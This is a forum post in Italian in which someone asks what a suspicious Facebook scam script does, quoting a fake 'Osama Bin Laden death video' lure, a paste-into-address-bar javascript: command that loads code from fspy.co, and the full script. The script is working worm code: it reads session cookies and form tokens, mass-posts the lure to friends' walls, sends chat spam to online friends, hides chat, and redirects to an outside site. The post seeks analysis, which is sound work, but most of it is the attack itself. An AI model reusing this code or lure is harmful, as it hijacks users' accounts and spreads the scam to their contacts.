L'ho ricevuto da un amico su Facebook e non penso che sia un messaggio autentico:
___ shared a link on your Wall.
This will leave you speechless)
http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668
Osama Bin Laden Death Video!
Navy Seals raid Bin Ladens hideout and execute him!
Lì ha dato un messaggio per digitare quanto segue nella barra degli indirizzi:
javascript:(a=(b=document).createElement('script')).src='//fspy.co/o.js?'+Math.random(),b.body.appendChild(a);void(0)
Ho controllato questo file fspy.co/o.js e il suo contenuto è il seguente.
Stavo cercando di capire cosa fa questo script. Qualcuno qui ha più approfondimenti? ////////////////////////////////////////////////// ////////////////////////////////////////////////// /////////// // KuNG FU JS v.1 20yrsplus.info ////////////////////////////////////////////////// ////////////////////////////////////////////////// ///////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
var user_id = readCookie("c_user");
// Setup some variables
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Multiple URL Shorteners
var shortArray = new Array(
"http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?",
"http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?"
);
var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];
// Chat message variables
var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
var prepared_chat = encodeURIComponent(this_chat);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.
if(http1.readyState == 4 && http1.status == 200) { // If state = success
var response1 = http1.responseText;
response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
response1 = JSON.parse(response1); // Convert the response to JSON
//alert(response4.toSource());
var count = 0;
for(uid in response1.payload.entries){
if(count < 400){
//alert("SENT TO "+response1.payload.entries[count].uid);
// Loop to send messages
// New XMLHttp object
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
var randLink = new Array("http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?", "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?");
var statusmessage="This will leave you speechless";
var title="Osama Bin Laden Death Video!";
// var link="http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
var link = randLink[Math.floor(randLink.length*Math.random())];
var description="Navy Seals raid Bin Ladens hideout and execute him! ";
var picture="http://cooldadssz.co.cc/laden.png";
var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
httpwp.open("POST", urlwp, true);
//Send the proper header information along with the request
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function() { //Call a function when the state changes.
if(httpwp.readyState == 4 && httpwp.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpwp.send(paramswp);
}
count++; // increment counter
}
http1.close; // Close the connection
}
}
http1.send(null);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);
//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");
http3.onreadystatechange = function() {//Call a function when the state changes.
if(http3.readyState == 4 && http3.status == 200) {
var response3 = http3.responseText;
response3 = response3.replace("for (;;);", "");
response3 = JSON.parse(response3);
var count = 0;
for(property in response3.payload.buddy_list.nowAvailableList){
if(count < 100){
// Loop to send messages
// New XMLHttp object
var httpc = new XMLHttpRequest();
// Generate random message ID
var msgid = Math.floor(Math.random()*1000000);
var time = Math.round(new Date().getTime() / 1000);
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
httpc.open("POST", urlc, true);
//Send the proper header information along with the request
httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpc.setRequestHeader("Content-length", paramsc.length);
httpc.setRequestHeader("Connection", "close");
httpc.onreadystatechange = function() { //Call a function when the state changes.
if(httpc.readyState == 4 && httpc.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpc.send(paramsc);
}
//alert(property);
count++; // increment counter
}
http3.close; // Close the connection
}
}
http3.send(params3);
/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");
http5.onreadystatechange = function() {//Call a function when the state changes.
if(http5.readyState == 4 && http5.status == 200) {
http5.close; // Close the connection
}
}
http5.send(params5);
*/
//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
var endArray = new Array("http://fspy.co/", "http://fspy.co/", "http://fspy.co/", "http://fspy.co/");
var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://fbview.net/osama.html';", 15000);